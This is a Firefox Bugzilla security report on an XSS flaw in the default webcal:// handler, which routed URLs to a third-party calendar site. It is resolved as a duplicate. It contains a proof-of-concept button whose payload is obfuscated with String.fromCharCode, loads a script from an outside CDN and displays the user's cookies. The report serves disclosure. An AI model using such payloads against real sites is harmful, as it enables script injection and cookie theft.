Closed Bug 1532035 Opened 6 years ago Closed 6 years ago

webcal:// default url handler is vunerable to XSS which allow malicious URL crafting (+ Invalid SSL certificate)

Categories

(Firefox :: File Handling, defect)

Product:
Firefox
Component:
File Handling
Version:
65 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1518627

People

(Reporter: mikagott, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0

Steps to reproduce:

Actual results:

  • The default handler had bad SSL certificates
  • The default handler has an XSS vulnerability on the parameter that i use to handle urls
  • A user can be prompted to open what seems to be a calendar related dataset but can be exploited by any kind of XSS exploits and without seeing it
  • A simple payload button example: (include boostrap.min.js in the page and show the user's cookies):

<button onclick='window.open("webcal:<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,47,47,109,97,120,99,100,110,46,98,111,111,116,115,116,114,97,112,99,100,110,46,99,111,109,47,98,111,111,116,115,116,114,97,112,47,52,46,51,46,49,47,106,115,47,98,111,111,116,115,116,114,97,112,46,109,105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))</script>");'>click me</button>

Explaination:
the following url (not really an url ..):
"webcal:<script>...</script>"

will trigger a request to the following one:
"https://30boxes.com/external/widget?refer=ff&url=webcal%3A<script>...</script>"

as the handler for (webcal://) is configured as following:
"https://30boxes.com/external/widget?refer=ff&url=%s"

Which lead to the ability to pass anything to the "url" parameter, which is the one affected by the XSS . And the user wouald just have clicked "Open with 30boxes ?" default prompt .

Expected results:

  • The default handlers should be thrustable one with valid certificates and probably hosted by Mozilla itself .
  • (not required) The URL (can/should) be displayed to the client before opening it (PopUp)

Some additional informations:

  • I'm using Firefox Quantum 65.0.1 (64-bit) (Fedora 29)
  • Seems that the file /.mozilla/firefox/default/mimeTypes.rdf is the one setting those handlers
  • I didn't tried it from mobile devices, but i know that they use "webcal://" schemes to handle events and calendar related stuff which can be parsed in a better/worst way

Someone else has already reported the XSS issue (bug 1518627), and we have removed the handler in Firefox 67 (current nightly) as a response to that issue, in bug 1252831.

(In reply to mikagott from comment #0)

  • I Saw that it had bad certificates

[snip]

  • The default handler had bad SSL certificates

Can you elaborate on what you mean here? I'm seeing some passive mixed content, which is a problem in the site's implementation but not with the certificate, so I'm assuming you mean something else.

Flags: needinfo?(mikagott)

Hum, okay was sure i add the last version, and for the certificates, i had warnings but i think that it was just a bad proxy node, i ran a sslscan and it seems okay so you can close the bug i guess !

Thank's for the quick answer !

Cheers,
Michael

Flags: needinfo?(mikagott)

(In reply to mikagott from comment #2)

Hum, okay was sure i add the last version,

65 is latest release. 67 is latest development version, see https://nightly.mozilla.org/ .

and for the certificates, i had warnings but i think that it was just a bad proxy node, i ran a sslscan and it seems okay so you can close the bug i guess !

Thank's for the quick answer !

Thanks again for reporting the issue!

Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Component: Untriaged → File Handling
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.